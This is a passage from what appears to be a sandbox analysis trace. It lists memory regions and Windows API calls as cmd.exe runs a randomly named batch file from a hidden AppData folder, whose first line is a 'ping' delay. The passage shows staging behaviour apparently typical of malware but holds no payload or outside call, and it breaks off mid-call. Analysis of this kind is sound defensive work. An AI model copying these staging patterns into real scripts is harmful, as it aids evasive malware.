8033 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8034 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8035 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8036 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 8037 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8038 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 
0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8039 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 8040 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 8041 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 8042 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 8043 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 8044 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 8045 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 8046 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8047 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8048 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8049 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = 
private name = "private_0x00000000002d0000" filename = "" Region: id = 8050 start_va = 0x1390000 end_va = 0x165efff entry_point = 0x1390000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 77 os_tid = 0xdc8 [0115.755] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afab4 | out: lpSystemTimeAsFileTime=0x2afab4*(dwLowDateTime=0x825bec20, dwHighDateTime=0x1d440a9)) [0115.755] GetCurrentProcessId () returned 0xdc4 [0115.755] GetCurrentThreadId () returned 0xdc8 [0115.755] GetTickCount () returned 0x2778f [0115.755] QueryPerformanceCounter (in: lpPerformanceCount=0x2afaac | out: lpPerformanceCount=0x2afaac*=17254440793) returned 1 [0115.756] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0115.756] __set_app_type (_Type=0x1) [0115.756] __p__fmode () returned 0x76b331f4 [0115.756] __p__commode () returned 0x76b331fc [0115.756] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0115.756] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0115.756] GetCurrentThreadId () returned 0xdc8 [0115.756] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdc8) returned 0x38 [0115.756] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0115.756] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0115.756] SetThreadUILanguage (LangId=0x0) returned 0x409 [0115.758] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0115.758] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afa44 | out: phkResult=0x2afa44*=0x0) returned 0x2 
[0115.758] VirtualQuery (in: lpAddress=0x2afa7b, lpBuffer=0x2afa14, dwLength=0x1c | out: lpBuffer=0x2afa14*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0115.759] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afa14, dwLength=0x1c | out: lpBuffer=0x2afa14*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0115.759] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afa14, dwLength=0x1c | out: lpBuffer=0x2afa14*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0115.759] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afa14, dwLength=0x1c | out: lpBuffer=0x2afa14*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0115.759] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afa14, dwLength=0x1c | out: lpBuffer=0x2afa14*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0115.759] GetConsoleOutputCP () returned 0x1b5 [0115.759] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0115.759] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0115.759] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.759] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0115.759] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.759] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0115.759] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.759] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0115.759] _get_osfhandle (_FileHandle=0) returned 0x3 [0115.759] GetConsoleMode (in: 
hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0115.760] _get_osfhandle (_FileHandle=0) returned 0x3 [0115.760] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0115.760] GetEnvironmentStringsW () returned 0x420150* [0115.760] FreeEnvironmentStringsW (penv=0x420150) returned 1 [0115.760] GetEnvironmentStringsW () returned 0x420150* [0115.760] FreeEnvironmentStringsW (penv=0x420150) returned 1 [0115.760] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae9b4 | out: phkResult=0x2ae9b4*=0x40) returned 0x0 [0115.760] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x0, lpData=0x2ae9c0*=0x0, lpcbData=0x2ae9b8*=0x1000) returned 0x2 [0115.760] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x4, lpData=0x2ae9c0*=0x1, lpcbData=0x2ae9b8*=0x4) returned 0x0 [0115.760] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x0, lpData=0x2ae9c0*=0x1, lpcbData=0x2ae9b8*=0x1000) returned 0x2 [0115.760] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x4, lpData=0x2ae9c0*=0x0, lpcbData=0x2ae9b8*=0x4) returned 0x0 [0115.760] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x4, lpData=0x2ae9c0*=0x40, lpcbData=0x2ae9b8*=0x4) returned 0x0 [0115.760] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: 
lpType=0x2ae9bc*=0x4, lpData=0x2ae9c0*=0x40, lpcbData=0x2ae9b8*=0x4) returned 0x0 [0115.760] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x0, lpData=0x2ae9c0*=0x40, lpcbData=0x2ae9b8*=0x1000) returned 0x2 [0115.760] RegCloseKey (hKey=0x40) returned 0x0 [0115.761] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae9b4 | out: phkResult=0x2ae9b4*=0x40) returned 0x0 [0115.761] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x0, lpData=0x2ae9c0*=0x40, lpcbData=0x2ae9b8*=0x1000) returned 0x2 [0115.761] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x4, lpData=0x2ae9c0*=0x1, lpcbData=0x2ae9b8*=0x4) returned 0x0 [0115.761] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x0, lpData=0x2ae9c0*=0x1, lpcbData=0x2ae9b8*=0x1000) returned 0x2 [0115.761] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x4, lpData=0x2ae9c0*=0x0, lpcbData=0x2ae9b8*=0x4) returned 0x0 [0115.761] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x4, lpData=0x2ae9c0*=0x9, lpcbData=0x2ae9b8*=0x4) returned 0x0 [0115.761] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x4, lpData=0x2ae9c0*=0x9, lpcbData=0x2ae9b8*=0x4) 
returned 0x0 [0115.761] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x0, lpData=0x2ae9c0*=0x9, lpcbData=0x2ae9b8*=0x1000) returned 0x2 [0115.761] RegCloseKey (hKey=0x40) returned 0x0 [0115.761] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635c [0115.761] srand (_Seed=0x5b88635c) [0115.761] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd\"" [0115.761] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd\"" [0115.761] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0115.761] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4219b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0115.762] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0115.762] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0115.762] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0115.762] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.762] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0115.762] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0115.762] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0115.762] 
_wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0115.762] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0115.762] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0115.762] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0115.762] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0115.762] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0115.762] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af780 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0115.762] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af780, lpFilePart=0x2af77c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af77c*="Desktop") returned 0x18 [0115.762] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0115.762] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af4fc | out: lpFindFileData=0x2af4fc) returned 0x41ffe0 [0115.762] FindClose (in: hFindFile=0x41ffe0 | out: hFindFile=0x41ffe0) returned 1 [0115.762] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af4fc | out: lpFindFileData=0x2af4fc) returned 0x41ffe0 [0115.763] FindClose (in: hFindFile=0x41ffe0 | out: hFindFile=0x41ffe0) returned 1 [0115.763] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af4fc | out: lpFindFileData=0x2af4fc) returned 0x41ffe0 [0115.763] FindClose (in: hFindFile=0x41ffe0 | out: hFindFile=0x41ffe0) returned 1 [0115.763] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0115.763] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0115.763] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0115.763] GetEnvironmentStringsW () returned 0x420150* 
[0115.763] FreeEnvironmentStringsW (penv=0x420150) returned 1 [0115.763] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0115.765] GetConsoleOutputCP () returned 0x1b5 [0115.827] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0115.827] GetUserDefaultLCID () returned 0x409 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af8c0, cchData=128 | out: lpLCData="0") returned 2 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af8c0, cchData=128 | out: lpLCData="0") returned 2 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af8c0, cchData=128 | out: lpLCData="1") returned 2 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 
[0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0115.827] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0115.828] GetConsoleTitleW (in: lpConsoleTitle=0x4201e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.828] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0115.828] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0115.828] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0115.829] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0115.832] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd", _String2=")") returned 58 [0115.832] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd") returned 3 [0115.832] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd") returned 3 [0115.832] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd") returned 6 [0115.832] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd") returned 6 [0115.832] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd") returned 15 [0115.832] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd") returned 15 [0115.832] GetConsoleTitleW (in: lpConsoleTitle=0x2af5b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.833] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.833] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.833] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2af374, nVolumeNameSize=0x104, 
lpVolumeSerialNumber=0x2af36c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2af36c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0115.833] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0115.833] SetErrorMode (uMode=0x0) returned 0x0 [0115.833] SetErrorMode (uMode=0x1) returned 0x0 [0115.833] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x42dc08, lpFilePart=0x2af0d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x2af0d8*="vMfCCeRYkvQy") returned 0x2d [0115.833] SetErrorMode (uMode=0x0) returned 0x1 [0115.833] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0115.834] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0115.837] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.837] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd", fInfoLevelId=0x1, lpFindFileData=0x2aee74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee74) returned 0x4208f0 [0115.837] FindClose (in: hFindFile=0x4208f0 | out: hFindFile=0x4208f0) returned 1 [0115.838] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0115.838] GetConsoleTitleW (in: lpConsoleTitle=0x2af34c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.838] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0115.840] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0115.841] IdentifyCodeAuthzLevelW () returned 0x1 [0115.846] 
GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0115.846] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0115.846] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0115.846] CloseCodeAuthzLevel () returned 0x1 [0115.846] SetErrorMode (uMode=0x0) returned 0x0 [0115.847] SetErrorMode (uMode=0x1) returned 0x0 [0115.847] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd", nBufferLength=0x104, lpBuffer=0x4204e8, lpFilePart=0x2af238 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd", lpFilePart=0x2af238*="1A4qO2RH.cmd") returned 0x3a [0115.847] SetErrorMode (uMode=0x0) returned 0x1 [0115.847] CmdBatNotification () returned 0x0 [0115.847] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\1a4qo2rh.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2af27c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0115.847] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0115.847] _get_osfhandle (_FileHandle=3) returned 0x58 [0115.847] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.847] _get_osfhandle (_FileHandle=3) returned 0x58 [0115.847] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.847] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2af260, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x2af260*=0x91, lpOverlapped=0x0) returned 1 [0115.848] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x0) returned 0x15 [0115.848] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=21, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0115.848] _get_osfhandle (_FileHandle=3) returned 0x58 [0115.848] GetFileType (hFile=0x58) returned 0x1 [0115.848] _get_osfhandle (_FileHandle=3) returned 0x58 [0115.848] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0115.848] _wcsicmp (_String1="ping", _String2=")") returned 71 [0115.848] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0115.848] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0115.848] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0115.849] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0115.849] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0115.849] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0115.849] _tell (_FileHandle=3) returned 21 [0115.849] _close (_FileHandle=3) returned 0 [0115.850] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2af034 | out: _Buffer="\r\n") returned 2 [0115.850] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.850] GetFileType (hFile=0x7) returned 0x2 [0115.850] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0115.850] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2aeff4 | out: lpMode=0x2aeff4) returned 1 [0115.850] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.850] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2af020, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af020*=0x2) returned 1 [0115.850] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0115.850] GetCurrentDirectoryW (in: nBufferLength=0x104, 
